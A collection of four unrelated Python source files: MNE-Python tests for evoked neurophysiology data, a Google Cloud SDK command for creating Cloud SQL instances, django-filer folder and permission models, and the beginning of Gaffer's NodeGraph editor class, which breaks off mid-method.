def test_evoked_resample():
"""Test for resampling of evoked data
"""
tempdir = _TempDir()
# upsample, write it out, read it in
ave = read_evokeds(fname, 0)
sfreq_normal = ave.info['sfreq']
ave.resample(2 * sfreq_normal)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_up = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
# compare it to the original
ave_normal = read_evokeds(fname, 0)
# and compare the original to the downsampled upsampled version
ave_new = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_new.resample(sfreq_normal)
assert_array_almost_equal(ave_normal.data, ave_new.data, 2)
assert_array_almost_equal(ave_normal.times, ave_new.times)
assert_equal(ave_normal.nave, ave_new.nave)
assert_equal(ave_normal._aspect_kind, ave_new._aspect_kind)
assert_equal(ave_normal.kind, ave_new.kind)
assert_equal(ave_normal.last, ave_new.last)
assert_equal(ave_normal.first, ave_new.first)
# for the above to work, the upsampling just about had to, but
# we'll add a couple extra checks anyway
assert_true(len(ave_up.times) == 2 * len(ave_normal.times))
assert_true(ave_up.data.shape[1] == 2 * ave_normal.data.shape[1])
def test_evoked_detrend():
"""Test for detrending evoked data
"""
ave = read_evokeds(fname, 0)
ave_normal = read_evokeds(fname, 0)
ave.detrend(0)
ave_normal.data -= np.mean(ave_normal.data, axis=1)[:, np.newaxis]
picks = pick_types(ave.info, meg=True, eeg=True, exclude='bads')
assert_true(np.allclose(ave.data[picks], ave_normal.data[picks],
rtol=1e-8, atol=1e-16))
@requires_pandas
def test_to_data_frame():
"""Test evoked Pandas exporter"""
ave = read_evokeds(fname, 0)
assert_raises(ValueError, ave.to_data_frame, picks=np.arange(400))
df = ave.to_data_frame()
assert_true((df.columns == ave.ch_names).all())
df = ave.to_data_frame(index=None).reset_index('time')
assert_true('time' in df.columns)
assert_array_equal(df.values[:, 1], ave.data[0] * 1e13)
assert_array_equal(df.values[:, 3], ave.data[2] * 1e15)
def test_evoked_proj():
"""Test SSP proj operations
"""
for proj in [True, False]:
ave = read_evokeds(fname, condition=0, proj=proj)
assert_true(all(p['active'] == proj for p in ave.info['projs']))
# test adding / deleting proj
if proj:
assert_raises(ValueError, ave.add_proj, [],
{'remove_existing': True})
assert_raises(ValueError, ave.del_proj, 0)
else:
projs = deepcopy(ave.info['projs'])
n_proj = len(ave.info['projs'])
ave.del_proj(0)
assert_true(len(ave.info['projs']) == n_proj - 1)
ave.add_proj(projs, remove_existing=False)
assert_true(len(ave.info['projs']) == 2 * n_proj - 1)
ave.add_proj(projs, remove_existing=True)
assert_true(len(ave.info['projs']) == n_proj)
ave = read_evokeds(fname, condition=0, proj=False)
data = ave.data.copy()
ave.apply_proj()
assert_allclose(np.dot(ave._projector, data), ave.data)
def test_get_peak():
"""Test peak getter
"""
evoked = read_evokeds(fname, condition=0, proj=True)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=1)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmax=0.9)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=0.02,
tmax=0.01)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', mode='foo')
assert_raises(RuntimeError, evoked.get_peak, ch_type=None, mode='foo')
assert_raises(ValueError, evoked.get_peak, ch_type='misc', mode='foo')
ch_idx, time_idx = evoked.get_peak(ch_type='mag')
assert_true(ch_idx in evoked.ch_names)
assert_true(time_idx in evoked.times)
ch_idx, time_idx = evoked.get_peak(ch_type='mag',
time_as_index=True)
assert_true(time_idx < len(evoked.times))
data = np.array([[0., 1., 2.],
[0., -3., 0]])
times = np.array([.1, .2, .3])
ch_idx, time_idx = _get_peak(data, times, mode='abs')
assert_equal(ch_idx, 1)
assert_equal(time_idx, 1)
ch_idx, time_idx = _get_peak(data * -1, times, mode='neg')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
ch_idx, time_idx = _get_peak(data, times, mode='pos')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
assert_raises(ValueError, _get_peak, data + 1e3, times, mode='neg')
assert_raises(ValueError, _get_peak, data - 1e3, times, mode='pos')
def test_drop_channels_mixin():
"""Test channels-dropping functionality
"""
evoked = read_evokeds(fname, condition=0, proj=True)
drop_ch = evoked.ch_names[:3]
ch_names = evoked.ch_names[3:]
ch_names_orig = evoked.ch_names
dummy = evoked.drop_channels(drop_ch, copy=True)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
evoked.drop_channels(drop_ch)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
def test_pick_channels_mixin():
"""Test channel-picking functionality
"""
evoked = read_evokeds(fname, condition=0, proj=True)
ch_names = evoked.ch_names[:3]
ch_names_orig = evoked.ch_names
dummy = evoked.pick_channels(ch_names, copy=True)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
evoked.pick_channels(ch_names)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
evoked = read_evokeds(fname, condition=0, proj=True)
assert_true('meg' in evoked)
assert_true('eeg' in evoked)
evoked.pick_types(meg=False, eeg=True)
assert_true('meg' not in evoked)
assert_true('eeg' in evoked)
assert_true(len(evoked.ch_names) == 60)
def test_equalize_channels():
"""Test equalization of channels
"""
evoked1 = read_evokeds(fname, condition=0, proj=True)
evoked2 = evoked1.copy()
ch_names = evoked1.ch_names[2:]
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
my_comparison = [evoked1, evoked2]
equalize_channels(my_comparison)
for e in my_comparison:
assert_equal(ch_names, e.ch_names)
def test_evoked_arithmetic():
"""Test evoked arithmetic
"""
ev = read_evokeds(fname, condition=0)
ev1 = EvokedArray(np.ones_like(ev.data), ev.info, ev.times[0], nave=20)
ev2 = EvokedArray(-np.ones_like(ev.data), ev.info, ev.times[0], nave=10)
# combine_evoked([ev1, ev2]) should be the same as ev1 + ev2:
# data should be added according to their `nave` weights
# nave = ev1.nave + ev2.nave
ev = ev1 + ev2
assert_equal(ev.nave, ev1.nave + ev2.nave)
assert_allclose(ev.data, 1. / 3. * np.ones_like(ev.data))
ev = ev1 - ev2
assert_equal(ev.nave, ev1.nave + ev2.nave)
assert_equal(ev.comment, ev1.comment + ' - ' + ev2.comment)
assert_allclose(ev.data, np.ones_like(ev1.data))
# default comment behavior if evoked.comment is None
old_comment1 = ev1.comment
old_comment2 = ev2.comment
ev1.comment = None
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
ev = ev1 - ev2
assert_equal(ev.comment, 'unknown')
ev1.comment = old_comment1
ev2.comment = old_comment2
# equal weighting
ev = combine_evoked([ev1, ev2], weights='equal')
assert_allclose(ev.data, np.zeros_like(ev1.data))
# combine_evoked([ev1, ev2], weights=[1, 0]) should yield the same as ev1
ev = combine_evoked([ev1, ev2], weights=[1, 0])
assert_equal(ev.nave, ev1.nave)
assert_allclose(ev.data, ev1.data)
# simple subtraction (like in oddball)
ev = combine_evoked([ev1, ev2], weights=[1, -1])
assert_allclose(ev.data, 2 * np.ones_like(ev1.data))
assert_raises(ValueError, combine_evoked, [ev1, ev2], weights='foo')
assert_raises(ValueError, combine_evoked, [ev1, ev2], weights=[1])
# grand average
evoked1, evoked2 = read_evokeds(fname, condition=[0, 1], proj=True)
ch_names = evoked1.ch_names[2:]
evoked1.info['bads'] = ['EEG 008'] # test interpolation
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
gave = grand_average([evoked1, evoked2])
assert_equal(gave.data.shape, [len(ch_names), evoked1.data.shape[1]])
assert_equal(ch_names, gave.ch_names)
assert_equal(gave.nave, 2)
def test_array_epochs():
"""Test creating evoked from array
"""
tempdir = _TempDir()
# creating
rng = np.random.RandomState(42)
data1 = rng.randn(20, 60)
sfreq = 1e3
ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
types = ['eeg'] * 20
info = create_info(ch_names, sfreq, types)
evoked1 = EvokedArray(data1, info, tmin=-0.01)
# save, read, and compare evokeds
tmp_fname = op.join(tempdir, 'evkdary-ave.fif')
evoked1.save(tmp_fname)
evoked2 = read_evokeds(tmp_fname)[0]
data2 = evoked2.data
assert_allclose(data1, data2)
assert_allclose(evoked1.times, evoked2.times)
assert_equal(evoked1.first, evoked2.first)
assert_equal(evoked1.last, evoked2.last)
assert_equal(evoked1.kind, evoked2.kind)
assert_equal(evoked1.nave, evoked2.nave)
# now compare with EpochsArray (with single epoch)
data3 = data1[np.newaxis, :, :]
events = np.c_[10, 0, 1]
evoked3 = EpochsArray(data3, info, events=events, tmin=-0.01).average()
assert_allclose(evoked1.data, evoked3.data)
assert_allclose(evoked1.times, evoked3.times)
assert_equal(evoked1.first, evoked3.first)
assert_equal(evoked1.last, evoked3.last)
assert_equal(evoked1.kind, evoked3.kind)
assert_equal(evoked1.nave, evoked3.nave)
# test match between channels info and data
ch_names = ['EEG %03d' % (i + 1) for i in range(19)]
types = ['eeg'] * 19
info = create_info(ch_names, sfreq, types)
assert_raises(ValueError, EvokedArray, data1, info, tmin=-0.01)
def test_add_channels():
"""Test evoked splitting / re-appending channel types
"""
evoked = read_evokeds(fname, condition=0)
evoked.info['buffer_size_sec'] = None
evoked_eeg = evoked.pick_types(meg=False, eeg=True, copy=True)
evoked_meg = evoked.pick_types(meg=True, copy=True)
evoked_stim = evoked.pick_types(meg=False, stim=True, copy=True)
evoked_eeg_meg = evoked.pick_types(meg=True, eeg=True, copy=True)
evoked_new = evoked_meg.add_channels([evoked_eeg, evoked_stim], copy=True)
assert_true(all(ch in evoked_new.ch_names
for ch in evoked_stim.ch_names + evoked_meg.ch_names))
evoked_new = evoked_meg.add_channels([evoked_eeg], copy=True)
assert_true(ch in evoked_new.ch_names for ch in evoked.ch_names)
assert_array_equal(evoked_new.data, evoked_eeg_meg.data)
assert_true(all(ch not in evoked_new.ch_names
for ch in evoked_stim.ch_names))
# Now test errors
evoked_badsf = evoked_eeg.copy()
evoked_badsf.info['sfreq'] = 3.1415927
evoked_eeg = evoked_eeg.crop(-.1, .1)
assert_raises(RuntimeError, evoked_meg.add_channels, [evoked_badsf])
assert_raises(AssertionError, evoked_meg.add_channels, [evoked_eeg])
assert_raises(ValueError, evoked_meg.add_channels, [evoked_meg])
assert_raises(AssertionError, evoked_meg.add_channels, evoked_badsf)
| |
# Copyright 2013 Google Inc. All Rights Reserved.
"""Creates a new Cloud SQL instance."""
import argparse
import logging
from googlecloudapis.apitools.base import py as apitools_base
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import remote_completion
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.util import list_printer
from googlecloudsdk.sql import util
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Create(base.Command):
"""Creates a new Cloud SQL instance."""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
Please add arguments in alphabetical order except for no- or a clear-
pair for that argument which can follow the argument itself.
Args:
parser: An argparse parser that you can use to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'--activation-policy',
required=False,
choices=['ALWAYS', 'NEVER', 'ON_DEMAND'],
default=None,
help='The activation policy for this instance. This specifies when the '
'instance should be activated and is applicable only when the '
'instance state is RUNNABLE.')
parser.add_argument(
'--assign-ip',
required=False,
action='store_true',
help='Specified if the instance must be assigned an IP address.')
parser.add_argument(
'--authorized-gae-apps',
type=arg_parsers.ArgList(min_length=1),
metavar='APP',
action=arg_parsers.FloatingListValuesCatcher(),
required=False,
default=[],
help='List of App Engine app IDs that can access this instance.')
parser.add_argument(
'--authorized-networks',
type=arg_parsers.ArgList(min_length=1),
metavar='NETWORK',
action=arg_parsers.FloatingListValuesCatcher(),
required=False,
default=[],
help='The list of external networks that are allowed to connect to the'
' instance. Specified in CIDR notation, also known as \'slash\' '
'notation (e.g. 192.168.100.0/24).')
parser.add_argument(
'--backup-start-time',
required=False,
help='The start time of daily backups, specified in the 24 hour format '
'- HH:MM, in the UTC timezone.')
parser.add_argument(
'--no-backup',
required=False,
action='store_true',
help='Specified if daily backup should be disabled.')
parser.add_argument(
'--database-version',
required=False,
choices=['MYSQL_5_5', 'MYSQL_5_6'],
default='MYSQL_5_5',
help='The database engine type and version. Can be MYSQL_5_5 or '
'MYSQL_5_6.')
parser.add_argument(
'--enable-bin-log',
required=False,
action='store_true',
help='Specified if binary log should be enabled. If backup '
'configuration is disabled, binary log must be disabled as well.')
parser.add_argument(
'--follow-gae-app',
required=False,
help='The App Engine app this instance should follow. It must be in '
'the same region as the instance.')
parser.add_argument(
'--gce-zone',
required=False,
help='The preferred Compute Engine zone (e.g. us-central1-a, '
'us-central1-b, etc.).')
parser.add_argument(
'instance',
help='Cloud SQL instance ID.')
parser.add_argument(
'--master-instance-name',
required=False,
help='Name of the instance which will act as master in the replication '
'setup. The newly created instance will be a read replica of the '
'specified master instance.')
parser.add_argument(
'--pricing-plan',
'-p',
required=False,
choices=['PER_USE', 'PACKAGE'],
default='PER_USE',
help='The pricing plan for this instance.')
parser.add_argument(
'--region',
required=False,
choices=['asia-east1', 'europe-west1', 'us-central', 'us-east1'],
default='us-central',
help='The geographical region. Can be asia-east1, europe-west1, '
'or us-central.')
parser.add_argument(
'--replication',
required=False,
choices=['SYNCHRONOUS', 'ASYNCHRONOUS'],
default=None,
help='The type of replication this instance uses.')
parser.add_argument(
'--require-ssl',
required=False,
action='store_true',
help='Specified if users connecting over IP must use SSL.')
parser.add_argument(
'--tier',
'-t',
required=False,
default='D1',
help='The tier of service for this instance, for example D0, D1.')
parser.add_argument(
'--database-flags',
type=arg_parsers.ArgDict(min_length=1),
metavar='FLAG=VALUE',
required=False,
action=arg_parsers.FloatingListValuesCatcher(),
help='A space-separated list of database flags to set on the instance. '
'Use an equals sign to separate flag name and value. Flags without '
'values, like skip_grant_tables, can be written out without a value '
'after, e.g., `skip_grant_tables=`. Use on/off for '
'booleans. View the Instance Resource API for allowed flags. '
'(e.g., `--database-flags max_allowed_packet=55555 skip_grant_tables= '
'log_output=1`)')
parser.add_argument(
'--async',
action='store_true',
help='Do not wait for the operation to complete.')
@util.ReraiseHttpException
def Run(self, args):
"""Creates a new Cloud SQL instance.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Returns:
A dict object representing the operations resource describing the create
operation if the create was successful.
Raises:
HttpException: A http error response was received while executing api
request.
ToolException: An error other than http error occured while executing the
command.
"""
# Added this temporarily for debugging SQL instance creation failures
log.SetVerbosity(logging.DEBUG)
sql_client = self.context['sql_client']
sql_messages = self.context['sql_messages']
resources = self.context['registry']
util.ValidateInstanceName(args.instance)
instance_ref = resources.Parse(args.instance, collection='sql.instances')
instance_resource = util.ConstructInstanceFromArgs(sql_messages, args)
if args.master_instance_name:
replication = 'ASYNCHRONOUS'
activation_policy = 'ALWAYS'
else:
replication = 'SYNCHRONOUS'
activation_policy = 'ON_DEMAND'
if not args.replication:
instance_resource.settings.replicationType = replication
if not args.activation_policy:
instance_resource.settings.activationPolicy = activation_policy
instance_resource.project = instance_ref.project
instance_resource.instance = instance_ref.instance
operation_ref = None
if args.pricing_plan == 'PACKAGE':
if not console_io.PromptContinue(
'Charges will begin accruing immediately. Really create Cloud '
'SQL instance?'):
raise exceptions.ToolException('canceled by the user.')
try:
result = sql_client.instances.Insert(instance_resource)
operation_ref = resources.Create(
'sql.operations',
operation=result.operation,
project=instance_ref.project,
instance=instance_ref.instance,
)
if args.async:
return sql_client.operations.Get(operation_ref.Request())
util.WaitForOperation(
sql_client, operation_ref, 'Creating Cloud SQL instance')
log.CreatedResource(instance_ref)
rsource = sql_client.instances.Get(instance_ref.Request())
cache = remote_completion.RemoteCompletion()
cache.AddToCache(instance_ref.SelfLink())
return rsource
except apitools_base.HttpError:
log.debug('operation : %s', str(operation_ref))
raise
def Display(self, unused_args, result):
"""Display prints information about what just happened to stdout.
Args:
unused_args: The same as the args in Run.
result: The database created, or the operation if async.
"""
if result.kind == 'sql#instance':
list_printer.PrintResourceList('sql.instances', [result])
else:
self.format(result)
| |
import mptt
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.db.models import Q
from django.contrib.auth import models as auth_models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.core import urlresolvers
from filer.models import mixins
'''
Managers
'''
class FolderManager(models.Manager):
def with_bad_metadata(self):
return self.get_query_set().filter(has_all_mandatory_data=False)
class FolderPermissionManager(models.Manager):
def get_read_id_list(self, user):
"""
Give a list of a Folders where the user has read rights or the string
"All" if the user has all rights.
"""
return self.__get_id_list(user, "can_read")
def get_edit_id_list(self, user):
return self.__get_id_list(user, "can_edit")
def get_add_children_id_list(self, user):
return self.__get_id_list(user, "can_add_children")
def __get_id_list(self, user, attr):
if user.is_superuser:
return 'All'
allow_list = []
deny_list = []
group_ids = user.groups.all().values_list('id', flat=True)
q = Q(user=user)|Q(group__in=group_ids)|Q(everybody=True)
perms = self.filter(q).order_by('folder__tree_id', 'folder__level',
'folder__lft')
for perm in perms:
if perm.folder:
folder_id = perm.folder.id
else:
folder_id = None
if perm.type == FolderPermission.ALL:
if getattr(perm, attr):
allow_list = list(Folder.objects.all().values_list('id', flat=True))
else:
return []
if getattr(perm, attr):
if folder_id not in allow_list:
allow_list.append(folder_id)
if folder_id in deny_list:
deny_list.remove(folder_id)
else:
if folder_id not in deny_list:
deny_list.append(folder_id)
if folder_id in allow_list:
allow_list.remove(folder_id)
if perm.type == FolderPermission.CHILDREN:
for id in perm.folder.get_descendants().values_list('id', flat=True):
if getattr(perm, attr):
if id not in allow_list:
allow_list.append(id)
if id in deny_list:
deny_list.remove(id)
else:
if id not in deny_list:
deny_list.append(id)
if id in allow_list:
allow_list.remove(id)
return allow_list
'''
Models
'''
class Folder(models.Model, mixins.IconsMixin):
"""
Represents a Folder that things (files) can be put into. Folders are *NOT*
mirrored in the Filesystem and can have any unicode chars as their name.
Other models may attach to a folder with a ForeignKey. If the related name
ends with "_files" they will automatically be listed in the
folder.files list along with all the other models that link to the folder
in this way. Make sure the linked models obey the AbstractFile interface
(Duck Type).
"""
file_type = 'Folder'
is_root = False
can_have_subfolders = True
_icon = 'plainfolder'
parent = models.ForeignKey('self', null=True, blank=True, related_name='children')
name = models.CharField(max_length=255)
owner = models.ForeignKey(auth_models.User, related_name='filer_owned_folders', null=True, blank=True)
uploaded_at = models.DateTimeField(auto_now_add=True)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
objects = FolderManager()
@property
def file_count(self):
if not hasattr(self, '_file_count_cache'):
self._file_count_cache = self.files.count()
return self._file_count_cache
@property
def children_count(self):
if not hasattr(self, '_children_count_cache'):
self._children_count_cache = self.children.count()
return self._children_count_cache
@property
def item_count(self):
return self.file_count + self.children_count
@property
def files(self):
return self.all_files.all()
@property
def logical_path(self):
"""
Gets logical path of the folder in the tree structure.
Used to generate breadcrumbs
"""
folder_path = []
if self.parent:
folder_path.extend(self.parent.get_ancestors())
folder_path.append(self.parent)
return folder_path
def has_edit_permission(self, request):
return self.has_generic_permission(request, 'edit')
def has_read_permission(self, request):
return self.has_generic_permission(request, 'read')
def has_add_children_permission(self, request):
return self.has_generic_permission(request, 'add_children')
def has_generic_permission(self, request, type):
"""
Return true if the current user has permission on this
folder. Return the string 'ALL' if the user has all rights.
"""
user = request.user
if not user.is_authenticated() or not user.is_staff:
return False
elif user.is_superuser:
return True
elif user == self.owner:
return True
else:
att_name = "permission_%s_cache" % type
if not hasattr(self, "permission_user_cache") or \
not hasattr(self, att_name) or \
request.user.pk != self.permission_user_cache.pk:
func = getattr(FolderPermission.objects, "get_%s_id_list" % type)
permission = func(user)
self.permission_user_cache = request.user
if permission == "All" or self.id in permission:
setattr(self, att_name, True)
self.permission_edit_cache = True
else:
setattr(self, att_name, False)
return getattr(self, att_name)
def get_admin_url_path(self):
return urlresolvers.reverse('admin:filer_folder_change', args=(self.id,))
def get_admin_directory_listing_url_path(self):
return urlresolvers.reverse('admin:filer-directory_listing', args=(self.id,))
def __unicode__(self):
return u"%s" % (self.name,)
class Meta:
unique_together = (('parent','name'),)
ordering = ('name',)
permissions = (("can_use_directory_listing", "Can use directory listing"),)
app_label = 'filer'
# MPTT registration
try:
mptt.register(Folder)
except mptt.AlreadyRegistered:
pass
class FolderPermission(models.Model):
ALL = 0
THIS = 1
CHILDREN = 2
TYPES = (
(ALL, _('all items') ),
(THIS, _('this item only') ),
(CHILDREN, _('this item and all children') ),
)
folder = models.ForeignKey(Folder, null=True, blank=True)
type = models.SmallIntegerField(_('type'), choices=TYPES, default=0)
user = models.ForeignKey(auth_models.User, related_name="filer_folder_permissions", verbose_name=_("user"), blank=True, null=True)
group = models.ForeignKey(auth_models.Group, related_name="filer_folder_permissions", verbose_name=_("group"), blank=True, null=True)
everybody = models.BooleanField(_("everybody"), default=False)
can_edit = models.BooleanField(_("can edit"), default=True)
can_read = models.BooleanField(_("can read"), default=True)
can_add_children = models.BooleanField(_("can add children"), default=True)
objects = FolderPermissionManager()
def __unicode__(self):
if self.folder:
name = u'%s' % self.folder
else:
name = u'All Folders'
ug = []
if self.everybody:
user = 'Everybody'
else:
if self.group:
ug.append(u"Group: %s" % self.group)
if self.user:
ug.append(u"User: %s" % self.user)
usergroup = " ".join(ug)
perms = []
for s in ['can_edit', 'can_read', 'can_add_children']:
if getattr(self, s):
perms.append(s)
perms = ', '.join(perms)
return u"Folder: '%s'->%s [%s] [%s]" % (name, unicode(self.TYPES[self.type][1]), perms, usergroup)
class Meta:
verbose_name = _('Folder Permission')
verbose_name_plural = _('Folder Permissions')
app_label = 'filer'
| |
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
class NodeGraph( GafferUI.EditorWidget ) :
def __init__( self, scriptNode, **kw ) :
self.__gadgetWidget = GafferUI.GadgetWidget(
bufferOptions = set( [
GafferUI.GLWidget.BufferOptions.Double,
] ),
)
GafferUI.EditorWidget.__init__( self, self.__gadgetWidget, scriptNode, **kw )
graphGadget = GafferUI.GraphGadget( self.scriptNode() )
self.__rootChangedConnection = graphGadget.rootChangedSignal().connect( Gaffer.WeakMethod( self.__rootChanged ) )
self.__gadgetWidget.getViewportGadget().setChild( graphGadget )
self.__gadgetWidget.getViewportGadget().setDragTracking( True )
self.__frame( scriptNode.selection() )
self.__buttonPressConnection = self.__gadgetWidget.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) )
self.__keyPressConnection = self.__gadgetWidget.keyPressSignal().connect( Gaffer.WeakMethod( self.__keyPress ) )
self.__buttonDoubleClickConnection = self.__gadgetWidget.buttonDoubleClickSignal().connect( Gaffer.WeakMethod( self.__buttonDoubleClick ) )
self.__dragEnterConnection = self.__gadgetWidget.dragEnterSignal().connect( Gaffer.WeakMethod( self.__dragEnter ) )
self.__dropConnection = self.__gadgetWidget.dropSignal().connect( Gaffer.WeakMethod( self.__drop ) )
self.__nodeMenu = None
## Returns the internal GadgetWidget holding the GraphGadget.
def graphGadgetWidget( self ) :
return self.__gadgetWidget
## Returns the internal Gadget used to draw the graph. This may be
# modified directly to set up appropriate filters etc. This is just
# a convenience method returning graphGadgetWidget().getViewportGadget().getChild().
def graphGadget( self ) :
return self.graphGadgetWidget().getViewportGadget().getChild()
## Frames the specified nodes in the viewport. If extend is True
# then the current framing will be extended to include the specified
# nodes, if False then the framing will be reset to frame only the
# nodes specified.
def frame( self, nodes, extend=False ) :
self.__frame( nodes, extend )
def getTitle( self ) :
title = super( NodeGraph, self ).getTitle()
if title:
return title
result = IECore.CamelCase.toSpaced( self.__class__.__name__ )
root = self.graphGadget().getRoot()
if not root.isSame( self.scriptNode() ) :
result += " : " + root.relativeName( self.scriptNode() ).replace( ".", " / " )
return result
__plugContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# plug in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, plug, menuDefinition ) and the menu definition should just be
# edited in place.
@classmethod
def plugContextMenuSignal( cls ) :
return cls.__plugContextMenuSignal
__connectionContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# connection in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, destinationPlug, menuDefinition ) and the menu definition
# should just be edited in place.
@classmethod
def connectionContextMenuSignal( cls ) :
return cls.__connectionContextMenuSignal
__nodeContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# node in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, node, menuDefinition ) and the menu definition should just be
# edited in place. Typically you would add slots to this signal
# as part of a startup script.
@classmethod
def nodeContextMenuSignal( cls ) :
return cls.__nodeContextMenuSignal
## May be used from a slot attached to nodeContextMenuSignal() to install some
# standard menu items for modifying the connection visibility for a node.
@classmethod
def appendConnectionVisibilityMenuDefinitions( cls, nodeGraph, node, menuDefinition ) :
menuDefinition.append( "/ConnectionVisibilityDivider", { "divider" : True } )
menuDefinition.append(
"/Show Input Connections",
{
"checkBox" : IECore.curry( cls.__getNodeInputConnectionsVisible, nodeGraph.graphGadget(), node ),
"command" : IECore.curry( cls.__setNodeInputConnectionsVisible, nodeGraph.graphGadget(), node )
}
)
menuDefinition.append(
"/Show Output Connections",
{
"checkBox" : IECore.curry( cls.__getNodeOutputConnectionsVisible, nodeGraph.graphGadget(), node ),
"command" : IECore.curry( cls.__setNodeOutputConnectionsVisible, nodeGraph.graphGadget(), node )
}
)
## May be used from a slot attached to nodeContextMenuSignal() to install a
# standard menu item for modifying the enabled state of a node.
@classmethod
def appendEnabledPlugMenuDefinitions( cls, nodeGraph, node, menuDefinition ) :
enabledPlug = node.enabledPlug() if isinstance( node, Gaffer.DependencyNode ) else None
if enabledPlug is not None :
menuDefinition.append( "/EnabledDivider", { "divider" : True } )
menuDefinition.append(
"/Enabled",
{
"command" : IECore.curry( cls.__setEnabled, node ),
"checkBox" : enabledPlug.getValue(),
"active" : enabledPlug.settable()
}
)
__nodeDoubleClickSignal = Gaffer.Signal2()
## Returns a signal which is emitted whenever a node is double clicked.
# Slots should have the signature ( nodeGraph, node ).
@classmethod
def nodeDoubleClickSignal( cls ) :
return cls.__nodeDoubleClickSignal
## Ensures that the specified node has a visible NodeGraph viewing
# it, and returns that editor.
## \todo Consider how this relates to the todo items in NodeSetEditor.acquire().
@classmethod
def acquire( cls, rootNode ) :
if isinstance( rootNode, Gaffer.ScriptNode ) :
script = rootNode
else :
script = rootNode.scriptNode()
scriptWindow = GafferUI.ScriptWindow.acquire( script )
tabbedContainer = None
for editor in scriptWindow.getLayout().editors( type = GafferUI.NodeGraph ) :
if rootNode.isSame( editor.graphGadget().getRoot() ) :
editor.parent().setCurrent( editor )
return editor
editor = NodeGraph( script )
editor.graphGadget().setRoot( rootNode )
scriptWindow.getLayout().addEditor( editor )
return editor
def __repr__( self ) :
return "GafferUI.NodeGraph( scriptNode )"
def _nodeMenu( self ) :
if self.__nodeMenu is None :
self.__nodeMenu = GafferUI.Menu( GafferUI.NodeMenu.acquire( self.scriptNode().applicationRoot() ).definition(), searchable=True )
self.__nodeMenuVisibilityChangedConnection = self.__nodeMenu.visibilityChangedSignal().connect( Gaffer.WeakMethod( self.__nodeMenuVisibilityChanged ) )
return self.__nodeMenu
def __nodeMenuVisibilityChanged( self, widget ) :
assert( widget is self.__nodeMenu )
if not self.__nodeMenu.visible() :
# generally we steal focus on mouse enter (implemented in GadgetWidget),
# but when the node menu closes we may not get an enter event, so we have to steal
# the focus back here.
self.__gadgetWidget._qtWidget().setFocus()
def __buttonPress( self, widget, event ) :
if event.buttons & GafferUI.ButtonEvent.Buttons.Right :
# right click - display either the node creation popup menu
# or a menu specific to the node/plug/connection under the
# mouse if possible.
viewport = self.__gadgetWidget.getViewportGadget()
